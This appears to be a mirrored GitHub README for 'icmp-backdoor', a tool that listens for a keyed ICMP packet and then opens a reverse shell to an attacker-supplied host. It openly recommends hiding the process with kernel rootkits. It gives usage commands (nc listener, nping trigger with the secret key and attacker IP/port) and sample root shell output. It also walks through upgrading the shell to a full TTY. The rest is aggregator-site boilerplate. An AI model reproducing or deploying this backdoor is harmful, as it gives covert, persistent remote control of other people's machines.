Giter Site home page Giter Site logo

icmp-backdoor's Introduction

ICMP Backdoor

A cool ICMP listener and reverse shell. Ideally, should be used in conjunction with a LKM rootkit like Diamorphine or libprocesshider to hide the process. Hypothetically, this could be turned into shellcode and injected into processes with ptrace, but I wouldn't recommend it since this implementation isn't really minimal.

If you don't want to use nping to trigger the reverse shell, you can use the live-off-the-land version, which just requires ping and nc.

for educational purposes!

Usage

On the host machine, compile and run:

$ make
$ sudo ./backdoor

You can also ensure:

$ ./backdoor -v
Secret Key:		wA@2mC!dq
Service Name:	        backdoor
Shell Path:		/bin/bash

On the attacker machine start a netcat listener:

$ nc -lnvp <port>

And send an ICMP packet to the victim:

$ nping --icmp -c 1 -dest-ip <victim-ip> --data-string <secret-key> <attacker-ip> <port>'

Now you have your shell!

$ nc -l -p 4096
/bin/bash
ls
bin
boot
dev
etc
home
keybase
lib
lib64
lightdm
lost+found
media
mnt
nix
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var

Adding TTY

If you want to make your shell actually usable with TTY, here's my process. Or alternatively, check out these guides on upgrading your shell.

First, on your host machine, ensure you're using bash:

$ bash
$

Then initiate your reverse shell:

$ nc -l -p 4096
/bin/bash
ls
bin
boot
dev
etc
...

Then use python to get a pseudo-terminal:

/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
[root@user /]#

From here exit out of the terminal and do:

/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
[root@user /]#
Ctrl-Z
$ stty raw -echo
$ fg

From here your terminal will be pretty messed up:

nc -lvp 4096
            [cursor somewhere here]

Reset the terminal via the command reset. You might not be able to press enter - if you can't, use Ctrl-J instead.

nc -lvp 4096
            reset
...
[root@user /]#

From here, do all the basic terminal setting stuff:

[root@user /]# export SHELL=bash
[root@user /]# export TERM=xterm-256color
[root@user /]# stty rows <num> columns <cols>

Then you should be done! Vim/nano/etc should work decent from here.

icmp-backdoor's People

Contributors

jakeginesin avatar

Watchers

avatar

Forkers

nosafer

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.